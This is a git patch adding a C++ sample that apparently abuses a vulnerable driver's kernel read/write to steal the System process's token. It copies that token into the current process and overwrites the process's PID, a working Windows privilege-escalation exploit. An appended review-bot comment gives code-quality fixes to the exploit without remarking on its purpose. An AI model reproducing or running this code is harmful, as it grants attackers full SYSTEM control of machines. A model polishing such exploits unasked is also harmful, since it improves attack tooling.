From bfc85219bb515d635e0ca9057b1dbc48073e9449 Mon Sep 17 00:00:00 2001
From: dpcpointer
Date: Tue, 3 Jun 2025 19:07:00 -0600
Subject: [PATCH] Create sample.cpp

add a sample of what can be done with this,
---
 sample.cpp | 109 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 109 insertions(+)
 create mode 100644 sample.cpp

diff --git a/sample.cpp b/sample.cpp
new file mode 100644
index 0000000..ac80552
--- /dev/null
+++ b/sample.cpp
@@ -0,0 +1,109 @@
+#include "PdFwKrnl.h"
+
+typedef struct _EX_FAST_REF {
+ union {
+ VOID* Object;
+ ULONGLONG RefCnt : 4;
+ ULONGLONG Value;
+ };
+}EX_FAST_REF, *PEX_FAST_REF;
+
+int main(void) {
+ if (!pdfwkrnl::attach()) {
+ printf(STR("failed to attach to driver \n"));
+ return -1;
+ }
+
+ PVOID* ntoskrnl_object = nullptr;
+ PVOID* current_process_object = nullptr;
+ uint64_t current_process_pid = GetCurrentProcessId();
+ uint64_t ntoskrnl_pid = 4;
+ EX_FAST_REF ntoskrnl_token{};
+ EX_FAST_REF current_process_token{};
+
+ printf(STR("starting exploit \n"));
+
+ printf(STR("getting ntoskrnl object \n"));
+
+ pdfwkrnl::call_kernel_function(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
+ if (!ntoskrnl_object) {
+ printf(STR("failed to obtain ntoskrnl object \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);
+
+ printf(STR("getting ntoskrnl token \n"));
+
+ ntoskrnl_token = pdfwkrnl::read((uint64_t)ntoskrnl_object + 0x4b8);
+ if (!ntoskrnl_token.Object) {
+ printf(STR("failed to obtain ntoskrnl token \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);
+
+ printf(STR("current process pid %d \n"), current_process_pid);
+ printf(STR("ntoskrnl pid %d \n"), 4);
+
+ printf(STR("getting current process object \n"));
+
+ pdfwkrnl::call_kernel_function(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, ¤t_process_object);
+ if (!current_process_object) {
+ printf(STR("failed to obtain current process object \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("obtained current process object @ %p \n"), current_process_object);
+
+ printf(STR("getting current process token \n"));
+
+ current_process_token = pdfwkrnl::read((uint64_t)current_process_object + 0x4b8);
+ if (!current_process_token.Object) {
+ printf(STR("failed getting current process token \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("overwriting current process token with ntoskrnl's token \n"));
+
+ if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
+ printf(STR("failed overwriting current process token \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("checking if overwrite was success \n"));
+
+ EX_FAST_REF current_process_token_temp = pdfwkrnl::read((uint64_t)current_process_object + 0x4b8);
+ if (current_process_token_temp.Object != ntoskrnl_token.Object) {
+ printf(STR("failed overwriting current process token \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("token was successfully overwriten \n"));
+
+ printf(STR("overwriting current process's pid to ntoskrnl's \n"));
+
+ if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
+ printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("checking if current process's pid was overwriten \n"));
+
+ if (pdfwkrnl::read((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
+ printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
+ return pdfwkrnl::detach();
+ }
+
+ printf(STR("pid was successfully overwriten \n"));
+
+ printf(STR("hello to two ntoskrnl's lol \n"));
+
+ printf(STR("exploit complete bye (: \n"));
+
+ printf(STR("enter to exit \n"));
+
+ getchar();
+
+ return pdfwkrnl::detach();
+}
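Review bot: `current_process_pid` is a `uint64_t` but is printed with `%d` on the `printf(STR("current process pid %d \n"), current_process_pid);` line, which is a format/argument mismatch and undefined behaviour; use `%llu` with a cast to `unsigned long long` (or `PRIu64` from `<cinttypes>`). Every failure branch ends in `return pdfwkrnl::detach();` and so does the success path, so the process exit status is whatever detach() returns in both cases and a caller cannot tell a failed run from a completed one; keep an `int status` local that the failure branches set, call detach() once, and return the status. The literals `0x4b8` and `0x440` are repeated as bare magic numbers that the surrounding messages describe as the token and pid fields; a named `constexpr` for each with a comment saying what field it denotes and that the value is tied to a specific build would document what the code currently leaves implicit. The `¤t_process_object` argument is presumably `&current_process_object` mangled by entity decoding in this rendering rather than in the committed file.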